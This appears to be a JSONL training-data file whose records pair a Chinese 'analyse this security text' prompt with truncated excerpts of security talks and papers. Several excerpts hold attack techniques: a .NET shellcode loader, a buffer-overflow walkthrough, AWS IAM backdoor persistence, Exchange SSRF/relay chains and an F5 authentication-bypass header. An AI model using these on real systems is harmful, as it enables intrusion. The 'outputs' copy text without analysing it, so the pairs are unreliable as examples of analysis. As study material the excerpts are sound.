1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000 ``` ### References * [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nASM in .NET: The old is new again by Jon McCoy(DigitalBodyGuard) Abstract: This paper will cover running raw Machine Code(ASM) from within .NET. As we all know .NET runs on IL(Intermediate Language) also known as Managed byte code. A program can declare an unsafe section of code and drop out from the managed area to run something like unmanaged C++ or the like. This paper will show how to run raw/unmanaged ASM in a normal safe C# application. The Basics of running ASM under .NET: To run ASM code just make a pointer to your target byte code. The execution point will jump you to the byte code and start executing, no unsafe keyword needed. This method currently requires one call to unmanaged code to allocate memory in code space. The sequence is as follows:  Create an allocated space for the ASM byte code  Copy the byte code into the allocated space  Turn the pointer into a Delegate  Run the Delegate  Free up the space // make some space for the byte code in code space, so it can be ran IntPtr pointer = VirtualAlloc(IntPtr.Zero, new UIntPtr((uint)_ASM_Code.Length), AllocationType.COMMIT | AllocationType.RESERVE, MemoryProtection.EXECUTE_READWRITE); // copy the ASM code into memory(code memory) System.Runtime.InteropServices.Marshal.Copy(_ASM_Code, 0, pointer, _ASM_Code.Length); // build the function pointer to the ASM code(x64)!!!!!!!!!! funPointer ASM_Function = (funPointer)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(pointer, typeof(funPointer)); // Run the ASM code ASM_Function(); // free up the ASM code in mem:) VirtualFree(pointer, 0, 0x8000); Complete Class code below This method requires access to VirtualAlloc/VirtualFree from kernel32.dll. This call into kernal32 is possible to block by revoking access to calling unmanaged resources and will only work in windows. The ability to run ASM under .NET with the code I supply can be stopped by removing the ability to call unmannaged assemblies. At the end of this paper, I cover how to setup a p", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 执行 Shellcode的介绍 shellcode 是一段用于利用软件漏洞而执行的代码shellcode 为16进制之机械码以其经常让攻击者获得 shell 而得名shellcode 常常使用机器语言编写 可在暂存器 eip 溢出后塞入一段可让 CPU 执行的 shellcode 机械码让电脑可以执行攻击者的任意指令在编译时关闭 ASLRNX CANARY 选项这样就可以在输入时把 shellcode 布置在栈中通过动态调试获得所需要的 padding 溢出到返回地址为输入的 shellcode 地址这样程序返回后便会执行 shellcode ### 执行 Shellcode示例 下面给出一个经典例子验证程序溢出后执行 **shellcode**编译的环境为 winxp 工具为 vc6.0 ```c #include <stdio.h> #include <windows.h> #define PASSWORD \"1234567\" int verify_password(char *password) { int authenticated; char buffer[50]; authenticated = strcmp(password,PASSWORD); memcpy(buffer,password,strlen(password)); return authenticated; } void main() { int valid_flag =0; char password[1024]; FILE *fp; LoadLibrary(\"user32.dll\"); if (!(fp=fopen(\"password.txt\",\"rw+\"))) { exit(0); } fscanf(fp,\"%s\",password); valid_flag = verify_password(password); if (valid_flag !=0) { printf(\"incorrect password!\\n\\n\"); } else { printf(\"Congratulation! You have passed the verification!\\n\"); } fclose(fp); getchar(); } ``` 编译完成后拖入 OllyDbg 动态调试确定 **padding** 的长度在 **memcpy** 处下一个断点方便随后调试可以先生成50 BYTES 的 padding 比较与返回地址的距离最后确定为60 BYTES 后为返回地址 输入的字符串会被复制到栈中 **0012FAE4** 的位置 因为通过合理的 padding 控制了返回地址到 **0012FAE4**所以在函数返回时寄存器 **EIP** 的值为 **0012FAE4**这时系统会认为栈中的数据为机器码程序就会执行地址为 **0012FAE4** 的代码 **password.txt** 中的内容为精心布置的机器码功能是弹出一个消息框内容为 **hackhack**如何编写 **password.txt** 中的内容我们放在后面的章节来讲本章着重介绍整个执行流程 如我们所期望的程序返回后执行了弹窗功能", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIndustrial Cybersecurity Landscape in 2020: Trends, Challenges, and Opportunities Dr. Terence Liu VP-GM, Trend Micro and TXOne Networks All product names, logos, and brands are property of their respective owners. All company, product and service names used in this deck are for identification purposes only. Use of these names, logos, and brands does not imply endorsement. START POINT OF THE HEAT OT IT and OT Have Converged IT ERP IIoT ! ! Careless Insider Foiled Conspiracy 1. Launch an DDoS attack against Tesla in order to preoccupy the companys security staff 2. Utilize malware to exfiltrate data for further ransom  No wireless, no Bluetooth  No connection (ethernet)  Physical Isolation (six walls)  All software/hardware tested BEFORE installing  Data only passed by personal means, USB, CD, DVD == Your business does not need to optimize production Air-gapped OT is actually RARE for modern factories Stuxnet DUQU Shamoon,Flamer, Gauss Havex, Dragonfly BlackEnergy 3 Industroyer Shamoon 2 Triton, Trisis WannaCry,NotPeta, Bad Rabbit VPNFilter LockerGoga,Ekans, DoppelPaymer ColdLock 2010 2011 2012 2013 2014 2015 2016 2017 2017 2018 2019 2020 Critical Infrastructure Manufacturing Threats Paradigm Shift in ICS World Manufacturers could be TARGETED Evolving Cyber Attacks in ICS WannaCry 2017 Non-Targeted attack. Worm propagation. LockerGoga 2019 Targeted attack. File encryption. Snake/EKANS 2020 Targeted attack. File encryption. Detect and encrypt ICS-related files. DoppelPaymer 2020 Targeted attack. File encryption and data exfiltration. Kill OT tasks. Merck, FedEx, Maersk, TSMC,  Norsk Hydro, Altran, Hexion, Momentiv Honda, and Enel Argentina PEMEX, and Visser Precision (supplier of Boeing, Tesla, and Lockheed Martin) A focus on ORM  or operational resilience management - beyond information-centric cybersecurity is sorely needed, - Gartner A LEAGUE OF THEIR OWN 2015 Ukraine Power Grid Cyber Attack 10 Business Network Internet Control System Network Field Device Network 1.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGeo Geo--IP Blocking: A sometimes IP Blocking: A sometimes effective Mal effective Mal--ware deterrent ware deterrent DEFCON 13 Presentation July 30, 2005 Agenda Agenda What is Geo-IP Blocking? Why Geo-IP Block? Why not to Geo-IP Block How Geo-IP Blocking works Regional Internet Registries (RIRs) Different Geo-IP Blocking strategies Automation Caveats Presenter AKA Shameless Presenter AKA Shameless Personal Plug Personal Plug Tony Howlett President of Network Security Services, Inc. CISSP, GSNA, CNA, CSSA Author of Open Source Security Tools 17 years of experience building and managing networks What is Geo What is Geo--IP Blocking? IP Blocking? Indiscriminately blocking entire sections of IP addresses related to geographical areas at your firewall or router Spam Statistics Spam Statistics A recent study show that the following countries were the leaders in originating spam USA 42% South Korea 13% China 8% Blocking those two countries alone would take care of 21% of your spam Source: SpamHaus 2005 Why Geo Why Geo--IP Block? IP Block? Quick (within minutes) No Cost (just entries in a router) Avoids almost ALL types of attacks including zero day and unreported exploits (at least those originating from the blocked countries) Easily reversible Users can still access blocked sites outbound Most companies dont need to give the ENTIRE world access to their network. Even Fortune 500 companies can use this for some parts of their network. More Reasons to Geo More Reasons to Geo--IP Block IP Block  May become more effective over time as more spam / malware moves offshore  May force bad actor countries to crack down on spam / malware  China recently announced a crackdown on spam partially due to pressure form ISPs blocking their IP space Types of Types of malware malware Geo Geo--IP can IP can stop stop  Spam  Email Fraud  Phishing  Viruses  Worms  Automated hacking tools  Manual hacking (script kiddies)  Prohibited website hosted offshore (porn, gambling, etc) Reasons NOT to G", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploiting SCADA Systems Jeremy Brown Vulnerability Research Engineer @ Tenable Attack Vectors via Software Vulnerabilities Client-side attacks from web browsers, e-mail, and malicious servers Server-side attacks from the internet or internal network Clickjacking!? So.. whats wrong? Security has been implemented as an add-on instead of being build around the product from the ground up Systems are typically installed for long term, and software upgrades may require new hardware Something somewhere is connected to something that is connected to the Internet Vendors can take their time with updates, and managers may also take their time updating There are a ton of vulnerabilities in SCADA software! Who may find the bugs? Employees Hackers (up to no good) Security Researchers Anyone who cares to look really.. Sploitware A framework designed specifically to penetration test SCADA systems Similar concept to Metasploit or CANVAS, yet focused on SCADA software Can check systems for potentially vulnerable software Exploitation is optional but readily available Methods for identifying vulnerabilities? Manual testing to fuzzing to reverse engineering R&D findings range from RCE to DoS to Integrity Loss DEMO! Recommendations Vendors... Try to break it before you ship it! Clients... Do a security evaluation before you make the purchase. SCADA software can be just as vulnerable as your typical download.com application. Thank you", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nProxyNotShell (疑似) 分析与poc 1. 漏洞原理分析 Exchange 的ProxyNotShell 漏洞已经爆出来挺久了临时缓解措施都已经绕过几轮了但是一直没有 poc放出来也没有明确的漏洞原理泄露前一段时间twitter上有人分享了一些思路可能是 ProxyNotShell 的 ssrf 部分不过热度过去了也没太多人关注所以我把这个思路的poc写了一下和 大家分享一下如果最后不是ProxyNotShell 那就叫它 NotProxyNotShell 吧 首先回忆一下 ProxyShell 的利用链autodiscover 前端端点的 ssrf 漏洞自带 kerberos 认证认证用户 为 NT AUTHORITY\\SYSTEM但是system用户没有对应邮箱要想用这个认证使用后端的端点需要 X-CommonAccessToken 头部字段但是X-CommonAccessToken 不能由用户随意设置会被 autodiscover 前端端点过滤掉好在 PowerShell 的后端端点存在一个 X-Rps-CAT 查询参数可以作为 X-CommonAccessToken 的平替通过在X-Rps-CAT指定一个 伪造的exchange administrator 的 token 我们可以将 NT AUTHORITY\\SYSTEM 的认证降级为 exchange administrator并获得 exchange administrator 的 remote powershell ProxyShell 的补丁将 ssrf 自带的kerberos认证去掉了但是ssrf留了下来现在我们可以带着认证去使 用这个ssrf这样 autodiscover 会根据我们认证的用户生成 X-CommonAccessToken并传递给后端 服务 原本Exchange的 powershell 前端端点只支持 kerberos 认证但通过这个 ssrf 我们可以借助 autodiscover 作为前端端点并可以使用它的 basic 认证ntlm认证 以及其他的认证方式 建立 remote powershell比如下面这样 但如果直接使用这种方式autodiscover 前端会根据我们认证的用户生成 X-CommonAccessToken 并 传递给 PowerShell 后端这样由于我们是以普通用户认证的获得的也会是一个普通用户权限的 remote powershell而且由于 X-CommonAccessToken 的优先级高于 X-Rps-CAT这时也无法通过 X-Rps-CAT 来指定token 那是不是 X-CommonAccessToken 绝对不可能由用户直接指定呢到也不全是看下面的代码 这是 ProxyRequestHandler.AddProtocolSpecificHeadersToServerRequest() 里的一段代码描述了 autodiscover 前端端点是如何决定发送给后端的 X-CommonAccessToken 的 情况一如果用户请求里没有带 X-CommonAccessToken 头部则直接根据认证的用户生成响应的 X- CommonAccessToken如果是匿名用户则生成匿名token 情况二如果用户请求里带了 X-CommonAccessToken 头部首先要确保这个 CommonAccessToken 里指定的用户不能是 System 或 Machine 账户其次要确保我们用来认证的用户必须满足 IsSystemOrTrustedMachineAccount() 函数 IsSystemOrTrustedMachineAccount() 要求用户是 System 或者 name 以 $ 结尾(machine account)  并且具有 TokenSerialization 权限 也就是说直接指定 X-CommonAccessToken 的功能一般由 拥有TokenSerialization权限的machine account 使用以给予它们模拟其他用户的能力 说到这里允许Ntlm认证一个拥有TokenSerialization权限的machine account 我们应该可以想到 通过 Ntlm relay Exchagne Server 的machine account 来模拟/降级 出Exchagne administrator 的 remote powershell由于现在不允许 Ntlm relay 到发出认证请求的主机上所以只适用于 多 Exchagne Server 的环境 2. 写 poc 那按照这个思路其实poc也很好写了和 ProxyShell 相似只是多了 Ntlm re", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 利用 IAM 进行权限维持 --- <center><h1>利用 IAM 进行权限维持</h1></center> --- 利用 IAM 进行权限维持的原理也比较简单直接在 IAM 中创建一个拥有高权限的用户即可 例如这里选择添加用户访问类型选择控制台密码 </br><img width=\"800\" src=\"/img/1651980416.png\"></br> 设置权限选择直接附加现有策略策略选择AdministratorAccess即表示附加所有策略 </br><img width=\"800\" src=\"/img/1651980443.png\"></br> 创建完成后会提供自动生成的密码与登录地址使用这个登录地址和密码直接登录即可这时我们就制作好了一个后门账户 <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年5月8日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA SafeBreach Labs research by Itzik Kotler, CTO and co-founder, SafeBreach Amit Klein, VP Security Research, SafeBreach The Adventures of AV and the Leaky Sandbox About Itzik Kotler  15+ years in InfoSec  CTO & Co-Founder of Safebreach  Presented in RSA, HITB, BlackHat, DEFCON, CCC,   http://www.ikotler.org About Amit Klein  26 years in InfoSec  VP Security Research Safebreach (2015-Present)  30+ Papers, dozens of advisories against high profile products  Presented in BlackHat, HITB, RSA, CertConf, Bluehat, OWASP, AusCERT and more  http://www.securitygalore.com The story of the highly-secure enterprise  Variant #1: endpoints have restricted Internet access  Software update servers (Microsoft Update)  AV update/services  Variant #2: endpoints have no direct Internet access  On-premise update servers  On-premise AV management servers Now lets throw in Cloud AV  Everybody loves the wisdom of clouds  What can possibly go wrong? WHAT IF I TOLD YOU ADDING CLOUD AV CAN DEGRADE THE SECURITY OF THE ENDPOINT Lets degrade the security of the endpoint  Assuming highly secure enterprise (=restricted/no direct Internet connection)  Were going to use the cloud AV to exfiltrate data from the endpoint  Attacker can be anywhere in the Internet  Well (ab)use the cloud AV sandbox BUT FIRST  RELATED WORK Exfiltration at Large Lots and lots of research on exfiltration techniques, e.g.:  Covert Channels in TCP\\IP Protocol Stack by Aleksandra Mileva and Boris Panajotov  A survey of covert channels and countermeasures in computer network protocols by Sebastian Zander, Grenville Armitage and Philip Branch  Covert timing channels using HTTP Catch Headers by Dennis Kolegov, Oleg Broslavsky and Nikita Oleksov However, all practically assume unrestricted Internet connection Exfiltration from air-gapped endpoints Recent research on a more difficult scenario, e.g.:  LED-it-GO Leaking (a lot of) Data from Air-Gapped Computers via the (small) Hard Drive LED by Mordechai Guri, Boris Zadov, Eran Atias", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nversion: \"2\" services: apisix: image: vulhub/apisix:2.9 volumes: - ./apisix.yml:/usr/local/apisix/conf/config.yaml depends_on: - etcd ports: - \"9080:9080\" - \"9091:9091\" - \"9443:9443\" dashboard: image: vulhub/apisix-dashboard:2.9.0 volumes: - ./dashboard.yml:/usr/local/apisix-dashboard/conf/conf.yaml depends_on: - etcd ports: - \"9000:9000\" etcd: image: bitnami/etcd:3.4.15 environment: ETCD_ENABLE_V2: \"true\" ALLOW_NONE_AUTHENTICATION: \"yes\" ETCD_ADVERTISE_CLIENT_URLS: \"http://0.0.0.0:2379\" ETCD_LISTEN_CLIENT_URLS: \"http://0.0.0.0:2379\" ports: - \"2379:2379/tcp\"", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlowing up the Celly Building Your Own SMS/MMS Fuzzer Brian Gorenc, Manager, Vulnerability Research Matt Molinyawe, Security Researcher  Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 2 Agenda  Introduction  Bug Hunting  Testing Environment  Live Demonstration  Key Takeaways  Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Introduction  Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 4 whois Brian Gorenc Employer: HP Organization: HP Security Research Zero Day Initiative Responsibilities: Manager, Vulnerability Research Organizing Pwn2Own Hacking Competition Verifying EIP == 0x41414141 Free Time: Endlessly following code paths that dont lead to vulnerabilities Twitter: @MaliciousInput, @thezdi  Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 5 whois Matt Molinyawe Employer: HP Organization: HP Security Research Zero Day Initiative Responsibilities: Security Researcher Enjoying funny and awesome proof of concepts Measuring my productivity in hours of YouTube watched Process Janitor  Make exploits shine and not crash Calc Connoisseur Free Time: DJ Manila Ice  Two time United States Finalist DJ Scratched on 2014 Pwnie nominated song Security Kate Beat Contra using only the laser without death Beat QWOP Martial Arts Twitter: @djmanilaice  Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 6 Do-It-Yourself Fuzzing SMS/MMS is an interesting topic Always-on technology Limited in-line defenses Limited update capabilities Every researcher will have a different take on the problem Usually roll their own fuzzer along with mutation logic Aim for this talk is to demonstrate approaches to get st", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHTTPS://WWW.ISECPARTNERS.COM 1/6 ELECTROMECHANICAL PIN CRACKING IMPLEMENTATION AND PRACTICALITY Justin Engler  jengler[at]isecpartners[dot]com Paul Vines  pvines[at]isecpartners[dot]com iSEC Partners, Inc. 123 Mission Street, Suite 1020 San Francisco, Ca 94105 https://www.isecpartners.com July 8, 2013 Abstract PINs are often used for security on devices with touch-screen or physical keypads. Though other attacks are often available for these targets, in some cases only a brute-force attack is possible. This paper discusses several approaches for physical attacks against these systems and analyzes the practicality of these approaches against common brute-force countermeasures. 1 THE PROBLEM: LOCAL PASSWORDS WITHOUT AN AVAILABLE SOFTWARE OR ELECTRONIC ATTACK. Many devices are secured with passwords. Assuming a password cannot be observed in use or obtained from someone who knows it, possibly the best way to subvert the security of these devices is to attack them at the software level, by either:  bypassing the password completely (via a logic flaw, a vulnerability, etc.),  resetting the password to a known value,  or performing a password-guessing attack without any other security or user interface restrictions (Offline brute-force) Though a more educated password-guessing scheme might also be used (dictionaries, patterns, etc.), for the purposes of this paper we will call all password-guessing attacks brute-force attacks. In some cases, there will be no software-based attack possible. An example might be a mobile device's lock screen. Perhaps no jailbreak or root technique is available, or perhaps other considerations simply prohibit its use (such as forensic evidence requirements or scoping decisions on a security assessment). Other devices, like hardware PIN pads, are also common in this scenario. When software-based attacks are not feasible, the next best attack is an electronic attack:  Extract a password or key from the memory of a device via a chip reader or co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Javatrick之在懵逼中为Random跪下 LxLN 问题 LxLO 解答 LxLO.N 初步解答 LxLO.O 回看问题 LxLP 思考 LxLQ 杂项 LxLS 总结 这个在逛着https://stackoverflow.com突然发现个有点意思的段代码,或者说是有点意思的猴戏 怎么说呢,就是看完以后,不知道为啥,我就在懵逼中跪下了... 为了解决疑问,快速爬起来,我就决定解决这个疑问 先给你们看看这个问题是啥,你们就知道我为何懵逼了 https://stackoverflow.com/questions/15182496/why-does-this-code-using-random-strings- print-hello-world 翻译过来就是句话:下的代码将打印hello world,有能解释下吗? 概是这个意思,我也是有道云翻译的.... 0x01 问题 2 给出的代码也超级简单,可以拿idea跑下看看结果 3 Java 复制代码 // 让懵逼的代码 package Test2; import java.util.Random; public class Test1 { public static void main(String[] args) { System.out.println(randomString(-229985452) + \" \" + randomString(-147909649)); } public static String randomString(int i) { Random ran = new Random(i); StringBuilder sb = new StringBuilder(); while (true) { int k = ran.nextInt(27); if (k == 0) { break; } sb.append((char) ('`' + k)); } return sb.toString(); } } // 运结果 hello world 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 4 就问你... 这个代码给你,你第眼看到输出个hello world懵逼不懵逼? 懵逼完了以后,就可以开始想想为什么了 先看了眼源码,有点拗,让我有点懒的思考,于是决定去看看章的评论 0x02 解答 0x02.1 初步解答 5 我这么懒的逼,当然是选择看评论拉,看到个赞回答,看看写了啥先 有道翻译是这么说的: 当使特定的种值(seed)(在本例中是 -229985452 与 -147909649 )构 建 java.util.Random 的实例时 那么 java.util.Random 将从指定的种值(seed)开始成随机数 相同的种值(seed)构建的每个 java.util.Random 对象,每次都会产相同的数字 是不是感觉还是有点懵逼,简单的说就是当这个种值(seed)是固定的时,那么成出来的结果也是固定的 6 这我们做个实验,写段代码,运下,你就会恍然悟说的是啥了 Java 复制代码 // 随机数固定结果测试 package Test2; import java.util.Random; public class Test2 { public static void main(String[] args) { randomString(-229985452); System.out.println(\"--------------\"); randomString(-229985452); } private static void randomString(int i) { Random ran = new Random(i); System.out.println(ran.nextInt()); System.out.println(ran.nextInt()); System.out.println(ran.nextInt()); System.out.println(ran.nextInt()); System.out.println(ran.nextInt()); } } // 运结果 -755142161 -1073255141 -369383326 1592674620 -1524828502 -------------- -755142161 -1073255141 -369383326 1592674620 -1524828502 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env python import cgi; import sys from html import escape FLAG = open('/var/www/flag','r').read() OK_200 = \"\"\"Content-type: text/html <link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css\"> <center> <title>PyCalx</title> <h1>PyCalx</h1> <form> <input class=\"form-control col-md-4\" type=text name=value1 placeholder='Value 1 (Example: 1 abc)' autofocus/> <input class=\"form-control col-md-4\" type=text name=op placeholder='Operator (Example: + - * ** / // == != )' /> <input class=\"form-control col-md-4\" type=text name=value2 placeholder='Value 2 (Example: 1 abc)' /> <input class=\"form-control col-md-4 btn btn-success\" type=submit value=EVAL /> </form> <a href='?source=1'>Source</a> </center> \"\"\" print(OK_200) arguments = cgi.FieldStorage() if 'source' in arguments: source = arguments['source'].value else: source = 0 if source == '1': print('<pre>'+escape(str(open(__file__,'r').read()))+'</pre>') if 'value1' in arguments and 'value2' in arguments and 'op' in arguments: def get_value(val): val = str(val)[:64] if str(val).isdigit(): return int(val) blacklist = ['(',')','[',']','\\'','\"'] # I don't like tuple, list and dict. if val == '' or [c for c in blacklist if c in val] != []: print('<center>Invalid value</center>') sys.exit(0) return val def get_op(val): val = str(val)[:2] list_ops = ['+','-','/','*','=','!'] if val == '' or val[0] not in list_ops: print('<center>Invalid op</center>') sys.exit(0) return val op = get_op(get_value(arguments['op'].value)) value1 = get_value(arguments['value1'].value) value2 = get_value(arguments['value2'].value) if str(value1).isdigit()  str(value2).isdigit(): print('<center>Types of the values don\\'t match</center>') sys.exit(0) calc_eval = str(repr(value1)) + str(op) + str(repr(value2)) print('<div class=container><div class=row><div class=col-md-2></div><div class=\"col-md-8\"><pre>') print('>>>> print('+escape(calc_eval)+')') try: result = str(eval(calc_eval)) if result.isdigit() or", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPlaying with Web Application Firewalls DEFCON 16, August 8-10, 2008, Las Vegas, NV, USA http://ws.hackaholic.org Playing with Web Application Firewalls Who is Wendel Guglielmetti Henrique ?  Penetration Test analyst at SecurityLabs - Intruders Tiger Team Security division (http://www.intruders.com.br) - One of the leading companies in the segment in Brazil, among our clients are government, credit card industry, etc.  Affiliated to Hackaholic team (http://hackaholic.org/).  Has been working in IT since 1997, during the last 7 years he has worked in the computer security field.  Discovered vulnerabilities in many software programs like Webmails, Access Points, Citrix Metaframe, etc.  Wrote tools used as examples in articles in national magazines like PCWorld Brazil and international ones like Hakin9 Magazine.  Speaker at famous Brazilian conferences such as H2HC, Code Breakers and invited as speaker to IT Underground 2006 - Italy and IT1TK1 2007 - Mexico. http://ws.hackaholic.org Playing with Web Application Firewalls AGENDA:  What is WAF?  Types of operation modes.  Common topology.  Passive or Reactive?  Tricks to detect WAF systems.  Tricks to fingerprint WAF systems.  Generic evasion techniques.  Specific techniques to evade WAF systems.  What does it fail to protect ? http://ws.hackaholic.org Playing with Web Application Firewalls What is WAF? Web Application Firewall (WAF): An intermediary device, sitting between a web-client and a web server, analyzing OSI Layer-7 messages for violations in the programmed security policy. A web application firewall is used as a security device protecting the web server from attack. Source: Web Application Security Consortium Glossary. http://www.webappsec.org/projects/glossary/#WebApplicationFirewall http://ws.hackaholic.org Playing with Web Application Firewalls What is WAF?  Web Application Firewalls are often called 'Deep Packet Inspection Firewalls' because they look at every request and response within the HTTP/HTTPS/SOAP", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKonstantinos Karagiannis CTO, Security Consulting @konstanthacker ethereum is not bitcoin The key component is this idea of a Turing-complete blockchain --Vitalik Buterin smart contracts literally a billion reasons 30 million reasons will do caveats solidity dev tools  .sol files > bytecode > blockchain  Atom with plugins:  language-ethereum  etheratom  Remix: browser based solgraph oyente basic methodology  Interview devs  Review .sol file  Try compiling  Dissect code flowoptional solgraph  Run oyente (cross fingers)  Manually verify 3/4 vuln yay/nays  Manually check for following vulns reentrancy leave off the first re- for savings reentrancy (and irony) in the dao code default public  parity wallet hack initWallet execute unchecked send in king of the ether unchecked send gas limits withdraw dont send withdrawn not sent encryption transaction-ordering dependence call-stack depth limit variable or function ambiguity input validation throw -- being deprecated require (condition)  check external conditions (invalid inputs or errors in external components) assert (condition)  internal errors odds and ends  Timestamp dependence  Business logic flaws  Separating public/private data get involved dox me  or just keep in touch @konstanthacker konstantinos.karagiannis@bt.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nf5 0x00 f5 big-iprceCVE-2022-1388httpd pocconnection keepalive smugglingsmugglingsmugglingpre-auth rcechybeta hop-by-hophttps://t.zsxq.com/juJIAeEhop-by-hop https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers 0x01 hop-by-hop rfchttp end-to-endhop-by-hop Keep-Alive, Transfer-Encoding, TE, Connection, Trailer, Upgrade, Proxy-Authorization, Proxy-Authenticate RFC hop-by-hopconnection Connection: close, X-Foo, X-Bar X-FooX-Bar connection custom > apache proxy -> -> proxyurlurlproxy url hop-by-hopconnectionapache proxy f5 0x02 f5 pochttps://twitter.com/AnnaViolet20/status/1523564632140509184poc poc Connection: keep-alive,X-F5-Auth-Token X-F5-Auth-Token:a f5 X-F5-Auth-Token hop-by-hop 1. X-F5-Auth-Tokenhop token401serverapacheapache 2. hoptoken serverapachejavajava token 3. tokenhop f5hop-by-hop apacheurl token hop-by-hoptoken javajavatoken 0x03 hop-by-hop forwards connection headerconnectionhoplistforwards connection header connection connection You may have noticed that the Connection header itself is listed above as a default hop-by-hop header. This would suggest a compliant proxy should not be forwarding a request's list of custom hop-by-hop headers to the next server in the chain in its Connection header when it forwards the request - that is, a compliant proxy should consume the requests' Connection header entirely. However, my research suggests this may not always be occurring as expected - some systems appear to either also forward the entire Connection header, or copy the hop-by-hop list and append it to its own Connection header. For example, HAProxy appears to pass the Connection header through untouched, as does Nginx when acting as a proxy. HAProxynginxconnection nginxapachenginx 1. apacherfchop-by-hopconnection 2. nginxconnectionconnection F5apachenginx F5 apachenginxconnectionconnection 0x04 java 1. url 2. tokenurl 3. hop-by-hop", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhttp://Irongeek.com Adrian Crenshaw http://Irongeek.com I run Irongeek.com I have an interest in InfoSec education I dont know everything - Im just a geek with time on my hands Sr. Information Security Consultant at TrustedSec Co-Founder of Derbycon http://www.derbycon.com Twitter: @Irongeek_ADC http://Irongeek.com I will be taking two perspectives People trying to stay anonymous People trying to de-anonymize users Im not really a privacy guy IANAL Be careful where you surf, contraband awaits http://Irongeek.com http://Irongeek.com Darknets There are many definitions, but mine is anonymizing private network  Use of encryption and proxies (some times other peers) to obfuscate who is communicating to whom Sometimes referred to as Cipherspace (love that term) http://Irongeek.com The Onion Router http://Irongeek.com Who? First the US Naval Research Laboratory, then the EFF and now the Tor Project (501c3 non-profit). http://www.torproject.org/ Why? Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis. ~ As defined by their site What? Access normal Internet sites anonymously, and Tor hidden services. How? Locally run SOCKS proxy that connects to the Tor network. http://Irongeek.com Layered encryption Bi-directional tunnels Has directory servers Mostly focused on out proxying to the Internet More info at https://www.torproject.org Internet Server Directory Server http://Irongeek.com http://Irongeek.com Image from http://www.torproject.org/hidden-services.html.en http://Irongeek.com Image from http://www.torproject.org/hidden-services.html.en http://Irongeek.com Image from http://www.torproject.org/hidden-services.html.en http://Irongeek.com Image from http://www.torproject.org/hidden-services.html.en http://Irongeek.com Image from http://www.torproject.org/hidden-services.html.en http:", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTorturing Open Government Systems for Fun, Profit and Time Travel Dr. Tom Keenan FCIPS, I.S.P., ITCP, Professor Faculty of Environmental Design & Dept. of Computer Science keenan@ucalgary.ca @drfuture decreeping.wordpress.com DEF CON 21 Las Vegas, NV August 1-4, 2013 Disclaimers These views are mine, not my employers, my publishers, my cats etc. I DO LIKE OPEN DATA! I just want to see it done right. Some of the vulnerabilities shown have been fixed/changed/modified. They are still instructive as cautionary tales. More results will appear in a forthcoming book from OR Books and on my blog decreeping.wordpress.com The Six Ws of Open Data What is Open Data? Who has Open Data? Why is Open Data? Where is Open Data? When is Open Data? Worrisome aspects of Open Data What is the Open Data Movement? Initiative by many governments to make their data openly available Driven by:  Calls for transparency (its the taxpayers money)  Sincere desire for innovation (theyll come up with some great uses for our data at that Hackathon)  Fear (Wikileaks is going to get this anyway; it looks better if we release it)  Cheapness (we dont have to pay the developers)  Positive sentiments about open source, transparency, data wants to be free Some notable examples NYC Datamine Philadelphia OpenDataPhilly Open Data Framework (Vancouver, Edmonton, Toronto and Ottawa) Open Data Challenge (EU) Direct input systems like seeclickfix.com NYC Datamine On October 6, 2009 NYC released, with great fanfare, 103 municipal data sets One listed 1100 womens organizations in the city Release contained 